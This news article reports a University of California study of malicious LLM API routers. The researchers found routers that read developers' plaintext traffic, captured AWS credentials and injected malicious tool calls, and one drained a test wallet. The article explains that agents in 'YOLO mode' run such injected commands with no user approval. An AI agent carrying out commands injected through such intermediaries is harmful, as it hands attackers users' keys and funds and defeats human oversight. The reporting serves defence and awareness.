Key Takeaways
- University of California study identified 26 third-party AI routing services compromising crypto security
- Researchers lost Ether from a test wallet when one router executed a theft
- These intermediary services can access all plaintext data, including wallet keys and recovery phrases
- An automation feature dubbed “YOLO mode” enables AI tools to execute commands without user approval
- Security experts urge developers to keep sensitive crypto credentials away from AI agent workflows
A team from the University of California has uncovered a significant security vulnerability: certain third-party AI routing platforms are compromising cryptocurrency developers by harvesting sensitive credentials and inserting harmful code into their work environments.
The research, released in a new paper this week, examined what investigators termed “malicious intermediary attacks” targeting the large language model (LLM) infrastructure.
These LLM routing platforms function as middlemen positioned between developers and major AI service providers such as OpenAI, Anthropic, and Google. Their purpose is to coordinate and direct API traffic across various AI platforms.
The critical security flaw stems from these routers breaking encrypted web connections. This grants them complete, unencrypted visibility into every piece of information traveling through their systems.
Crypto developers leveraging AI programming assistants like Claude Code for building blockchain applications or cryptocurrency wallets could be unknowingly exposing private keys and recovery phrases through these routing services.
Investigators examined 28 commercial routing platforms and an additional 400 free alternatives collected from developer communities.
Results revealed nine platforms actively embedding malicious instructions, two implementing sophisticated evasion strategies, and 17 capturing researcher-controlled Amazon Web Services access credentials.
A single router successfully extracted Ether from a honeypot wallet established by the research team. The stolen amount totaled less than $50.
According to the researchers, distinguishing between legitimate credential processing and actual theft proves virtually impossible for end users, as routing services inherently access sensitive information in unencrypted format during normal operations.
Understanding the YOLO Mode Vulnerability
The study highlighted a concerning feature present in numerous AI agent platforms known as “YOLO mode.” When activated, this setting allows AI agents to run commands instantaneously without requiring user confirmation for each action.
This automation dramatically amplifies the threat. When a routing platform inserts malicious commands, YOLO mode enables their execution without any human oversight.
Researchers also discovered that previously trustworthy routers can be covertly compromised without the service provider’s awareness. Free routing platforms, specifically, may be providing subsidized API connectivity as bait while simultaneously harvesting user credentials.
Security Guidelines from Researchers
The investigation team recommended that developers bolster client-side security measures and establish strict policies preventing private keys or seed phrases from entering AI agent sessions.
For a sustainable solution, researchers emphasized that AI providers should implement cryptographic signatures for their outputs. This would enable developers to authenticate that instructions received by an agent genuinely originated from the legitimate model.
Co-author Chaofan Shou shared on X that “26 LLM routers are secretly injecting malicious tool calls and stealing creds.”
The research team concluded that LLM API routing platforms occupy a crucial security checkpoint that the AI industry presently assumes to be trustworthy without verification.
The published paper did not include specific details such as blockchain transaction identifiers for the compromised wallet.





